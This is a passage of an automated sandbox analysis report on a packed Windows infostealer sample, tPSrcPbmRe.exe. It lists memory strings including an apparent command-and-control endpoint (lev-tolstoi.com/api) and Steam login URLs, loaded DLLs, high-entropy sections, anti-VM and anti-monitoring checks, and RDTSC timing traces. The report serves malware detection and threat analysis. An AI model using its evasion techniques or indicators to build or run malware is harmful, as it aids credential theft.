                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: tPSrcPbmRe.exe, 00000000.00000003.2293272842.0000000005AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223120012.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2293272842.0000000005AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: tPSrcPbmRe.exe, tPSrcPbmRe.exe, 00000000.00000003.2267311649.0000000005AD5000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2320307864.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2245471516.000000000135C000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2268779813.0000000005AD6000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198657134.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2220955202.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2369256724.0000000005AD1000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2320254445.0000000005AD5000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293272842.0000000005AD5000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2245238274.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2378751257.0000000005AD6000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2245414561.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2220817144.000000000133A000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: tPSrcPbmRe.exe, 00000000.00000002.2377002468.00000000012EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/2U
                Source: tPSrcPbmRe.exe, 00000000.00000002.2378751257.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2369256724.0000000005ADF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/I
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198657134.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2377002468.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2320110166.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2377038945.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2298375362.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336933688.000000000133D000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2369474716.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336790976.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336790976.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2297990501.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api(
                Source: tPSrcPbmRe.exe, 00000000.00000002.2377038945.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2369474716.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336790976.0000000001354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api)
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245238274.0000000001331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiBy
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apic
                Source: tPSrcPbmRe.exe, 00000000.00000003.2320110166.00000000012C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apire
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiy
                Source: tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/d
                Source: tPSrcPbmRe.exe, 00000000.00000002.2377002468.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: tPSrcPbmRe.exe, 00000000.00000003.2320307864.00000000012F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piH
                Source: tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piP
                Source: tPSrcPbmRe.exe, 00000000.00000003.2320307864.00000000012F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/s
                Source: tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2297990501.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245238274.0000000001331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api8
                Source: tPSrcPbmRe.exe, 00000000.00000002.2377038945.000000000133F000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336933688.000000000133D000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336790976.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2375660843.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiWdtPWdtP
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223120012.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com

System Summary

Source: tPSrcPbmRe.exe | Static PE information: section name:
Source: tPSrcPbmRe.exe | Static PE information: section name: .idata
Source: tPSrcPbmRe.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Code function: 0_3_012EFA18
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Code function: 0_3_012F484F
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Code function: 0_3_012ED8E3
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Code function: 0_3_012B8232
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Code function: 0_3_012B96C2
Source: tPSrcPbmRe.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tPSrcPbmRe.exe | Static PE information: Section: ZLIB complexity 0.9973980629280822
Source: tPSrcPbmRe.exe | Static PE information: Section: lyuxeqdh ZLIB complexity 0.9946136290989771
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: tPSrcPbmRe.exe, 00000000.00000003.2246108279.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2246411057.0000000005B72000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2222314691.0000000005B07000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2222811784.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: tPSrcPbmRe.exe | ReversingLabs: Detection: 68%
Source: tPSrcPbmRe.exe | Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | File read: C:\Users\user\Desktop\tPSrcPbmRe.exe
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Section loaded: version.dll
Source: tPSrcPbmRe.exe | Static file information: File size 1866752 > 1048576
Source: tPSrcPbmRe.exe | Static PE information: Raw size of lyuxeqdh is bigger than: 0x100000 < 0x19f800

Data Obfuscation

Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Unpacked PE file: 0.2.tPSrcPbmRe.exe.a80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lyuxeqdh:EW;yvyxycgn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lyuxeqdh:EW;yvyxycgn:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: tPSrcPbmRe.exe | Static PE information: real checksum: 0x1cfea6 should be: 0x1d3564
Source: tPSrcPbmRe.exe | Static PE information: section name:
Source: tPSrcPbmRe.exe | Static PE information: section name: .idata
Source: tPSrcPbmRe.exe | Static PE information: section name:
Source: tPSrcPbmRe.exe | Static PE information: section name: lyuxeqdh
Source: tPSrcPbmRe.exe | Static PE information: section name: yvyxycgn
Source: tPSrcPbmRe.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Code function: 0_3_01334A1A push FFFFFFBDh; retf 0_3_01334A1C
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Code function: 0_3_01355278 push cs; iretd 0_3_01355279
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Code function: 0_3_01359843 push esp; ret 0_3_01359898
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Code function: 0_3_0135988F push esp; ret 0_3_01359898
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Code function: 0_3_012EE75C push eax; iretd 0_3_012EE761
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Code function: 0_3_012EDCCD push esi; retf 0_3_012EDCD0
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Code function: 0_3_012F87C8 push ds; retf 0_3_012F87CA
Source: tPSrcPbmRe.exe | Static PE information: section name: entropy: 7.985147260170899
Source: tPSrcPbmRe.exe | Static PE information: section name: lyuxeqdh entropy: 7.9536418626160845

Boot Survival

Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\tPSrcPbmRe.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C536AB second address: C536B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C536B1 second address: C536B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C5375D second address: C5377B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C5377B second address: C53781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C53781 second address: C537AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop edx 0x00000009 popad 0x0000000a nop 0x0000000b xor esi, 6208B49Dh 0x00000011 push 00000000h 0x00000013 mov ecx, dword ptr [ebp+122D3865h] 0x00000019 call 00007F9C81394BF9h 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jnc 00007F9C81394BF6h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C5387E second address: C53884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C53884 second address: C538A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F9C81394BF6h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jns 00007F9C81394BF6h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C538A1 second address: C538B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C80FB5671h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C538B6 second address: C538BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C538BA second address: C538F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jnc 00007F9C80FB566Eh 0x00000012 mov eax, dword ptr [eax] 0x00000014 je 00007F9C80FB5685h 0x0000001a pushad 0x0000001b jmp 00007F9C80FB5677h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
